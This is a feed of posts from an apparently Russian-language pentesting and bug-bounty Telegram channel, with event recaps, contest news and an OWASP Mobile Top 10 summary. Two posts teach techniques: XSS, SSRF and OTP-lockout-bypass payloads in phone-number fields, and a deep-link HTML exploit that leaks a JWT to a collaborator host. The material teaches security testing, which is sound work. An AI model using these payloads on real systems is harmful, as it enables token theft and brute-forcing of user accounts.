Что-то на пентестерском
2.57K subscribers
88 photos
10 videos
10 files
85 links
Веб, мобилки, баг баунти, пиво

Йа - @fir3wall1
Чат - https://t.iss.one/+-2ADwiR095I5YzQy
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Иии победителем в розыгрыше OFFZONE становится @Rusikergo
Поздравим победителя 🎉🎉
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18
Bug Bounty Blueprint: Руководство для начинающих баг хантеров и веб пентестеров

Данное руководство позволит тебе начать свой путь в мир баг баунти и веб пентеста, закрыть пробелы в знаниях и темах
Пошагово даёт понимание что изучать и на каком этапе, собраны еще и ресурсы где могут обучить хантить бесплатно. Happy hacking 😉

📶 Bug Bounty Blueprint

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥113👍3👏1
Поход на OFFZONE

Поход на OFFZONE получился приятным и хорошим.
Организаторы смогли передать атмосферу а-ля хакерской тусовки, а стенды компаний придумали веселые квесты и неожиданные плюшки для комьюнити багхантеров/пентестеров.

🟢Тинькофф задарил мерчем за багу о которой я писал, подарили: термос показывающий температуру, стикеры, кнопки для одежды на магните, пряник с надписью Багханчу за еду 😁
🟢Offzone при входе уже дарил мерч - пластмассовая красивая бутылка, еще и оригинальный бейдж в виде платы на которую можно еще и цеплять крутые аддоны от различных стендов
К тому же был еще и бесплатный кальян, а Positive Tech угощали фирменным пивом и всё это на крыше, откуда открывается красивый вид на тусовку снизу под музыку жанра техно 👍
🟢Удалось вживую встретиться со многими крутыми ребятами и даже с теми, кого давно знаешь но ни разу не видел вживую. Спикеры и доклады были на высоте, много полезного для себя подчеркнул
И это еще не всё..

📌 В целом сама атмосфера даёт мотивации двигаться и развиваться дальше, также позволяет просто поговорить душевно с разными людьми, обмениваться опытом. Всё таки комьюнити у нас суперское
Тем, кто не был - увидимся в следующем году 👍
Happy hacking 🤝

ЧТНП | #блабла
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥174
Android Insecure logging в виде инфографики
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍132
Атаки на механизм ввода номера телефона

Привет! Давай разберемся как найти уязвимости в форме ввода телефона.
Согласно RFC 5341 URI номера телефона может иметь параметры, которые нужны для передачи более точных данных
Чаще всего параметры принимают почтовые сервисы либо веб-приложения в которых отсутствует жесткая валидация номеров.

🟩Пример: параметр phone-context может использоваться для определения того, какой код страны(+7,+1) используется. Если ты зашел на сайт и определился твой город, то при регистрации вводя свой номер телефона, ты можешь вписать свой номер без кода страны т.к. он может подставится в параметр.

🟩Атаки используя параметры:
XSS
+88005553535;phone-context=<script>alert(1)</script>
// Следует поставить в query string параметр в который помещен номер

SSRF
+88005553535;phone-context=burpcollab
// Работает редко, в основном в старых системах

OTP Обход блокировки
+88005553535;ext=0
+88005553535;ext=2
+88005553535;ext=3
// Если заблокировали то подставляем ext с цифрой и продолжаем брутить с того кода, с которого залочили

📌 Более подробно изучить можно тут:
📶 HackTricks

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍32
IDOR - как предсказать идентификатор

Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉

📶 IDOR - how to predict an identifier

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16
Forwarded from Похек (Sergey Zybnev)
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare

Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.

#xakep #cloudflare

💬 Канал | 📡 Хакер | ➡️Более подробная информация
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯12👍4
Android & iOS Deep link vuln

Привет! Сегодня познакомимся с уязвимостями deep link'ов в мобильных приложениях и узнаем как найти в них уязвимости

🟢Deep Link
По сути дип линк нужен для координации или перенаправления в те или иные части мобильного приложения
Нужно это для удобства, ты можешь легко переключаться между приложениями или переходить с веб-сайта на приложение без переключения на само мобильное приложение
У каждого приложения свой дип линк и выглядит примерно так:
➡️ название_приложения://параметр
➡️ keklol://open_document=name

🟢Ищем уязвимости
Уязвимости возникают за счет неправильной обработки параметров из дип линков
Уязвимости могут быть разные в зависимости от того, что за параметр перед вами

➡️ Кейс:
Коллега на работе нашел уязвимость CSRF, данная уязвимость позволяла присылать JWT токен на burp collaborator
⬜️ Сначала ищем параметры дип линка, найти их можно при реверсе самого приложения, либо через утилиту strings
⬜️ Обнаружился параметр URL, который принимал сторонние ссылки
⬜️ Поскольку дип линк это ссылка, значит нужно создать эксплойт в виде простой html страницы с внедрением данного дип линка и его параметра
<a href="keklol://url=https://burp_collab">click</a>
⬜️ После открытия ссылки, на burp collaborator приходит jwt token, раскодировав токен, в нем обнаруживается конфиденциальная информация о пользователе

🟢Заключение
В целом на этом всё, импакт от этого может быть разный, в зависимости от того, что ты получаешь в ответ, если это RCE то критический, если присылаются пользовательские данные - высокий
Если можно заставить пользователя подписаться на какие-то каналы - низкий
Happy hacking ☺️

📌 В качестве дополнительных примеров делюсь полезными ссылками:
📶 RCE через deep link
📶 CSRF в приложении перископ

ЧТНП | #mobile
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥43
This media is not supported in your browser
VIEW IN TELEGRAM
🥰18👍1🔥1
Forwarded from Standoff 365
🤩 Конкурс инвайтов на Standoff Hacks за лучшие материалы о прикладной безопасности завершен!

Талантливые авторы присоединятся к нашему priv8-ивенту, который пройдет 26 ноября в рамках Moscow Hacking Week.

Пять инвайтов мы разыграли за самые крутые статьи. Вот ники победителей и их темы:

1. whoamins. «Обычный Client Side с необычной эксплуатацией»

2. qwqoro. «E-mail Injection»

3. iSavAnna. «Не все "ошибки" одинаково полезны — с точки зрения безопасности»

4. Ivan. «Как не стоит обрезать изображения. aCropalypse (CVE-2023-21036)»

5. Firewall. «Как ломать сайты на 1С-Битрикс»

Один бонусный, шестой, инвайт — за видео «Гайд по рекону в багбаунти для новичков», его получает lifei8hitt.

А еще свою статью «Анализ прошивки» прислал superhacker123 — она вышла достойной, но ее автор получил инвайт еще до конкурса 😉

Все работы скоро будут опубликованы на Хабре (следить за обновлениями можно здесь) — они помогут специалистам по кибербезопасности стать еще сильнее (и, возможно, принять участие в следующем Hacks). С заслуженной победой! 👏
❤‍🔥15🔥41
Победа 😎
Буду вещать вам с хакса ❤️
Также если будет можно, то и новые статьи про баги с баг баунти буду публиковать 🦔
Please open Telegram to view this post
VIEW IN TELEGRAM
23
OWASP Mobile Top Ten 2023

Наконец-то, спустя 7 лет вышел новый топ 10 по мобилкам
Вот как это теперь выглядит вкратце:

🟢M1: Improper Credential Usage
🟢M2: Inadequate Supply Chain Security
🟢M3: Insecure Authentication/Authorization
🟢M4: Insufficient Input/Output Validation
🟢M5: Insecure Communication
🟢M6: Inadequate Privacy Controls
🟢M7: Insufficient Binary Protections
🟢M8: Security Misconfiguration
🟢M9: Insecure Data Storage
🟢M10: Insufficient Cryptography

Happy hacking ☺️

📌 Полезные ссылки по апдейту:
📶 Мысли основателя канала Android Guard
📶 OWASP 2023

ЧТНП | #mobile
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥31
#podcast #НеДляГалочки

Утечки или ночной кошмар DPO. Откуда берутся, в чем причины. Разбираем кейсы с этичным хакером
😄

ОСТОРОЖНО! В этом выпуске много практических кейсов, конкретных рекомендаций и историй из жизни хакера.

💡Apple, Яндекс

🎤Ведущие выпуска:

🔵Кристина Боровикова, со-основатель RPPA, Kept Privacy Team Lead

🔵Елизавета Дмитриева, data privacy engineer в российском инхаусе

🆕Помогали справиться с кошмаром:

🔵Александр Герасимов — этичный хакер, эксперт в области тестирования на проникновение и анализа защищенности. Директор по информационной безопасности и сооснователь Awillix.

🔵Елизавета Никулина — директор по маркетингу и PR в Awillix

Обсудили:

⬇️Векторы атак
⬇️Жизненный цикл утечек данных
⬇️Последствия утечек для человека
⬇️Реагирование на инциденты, а том числе PR-позиция компании
⬇️Немного коснулись базовой инфобезной терминологии
Please open Telegram to view this post
VIEW IN TELEGRAM
👍81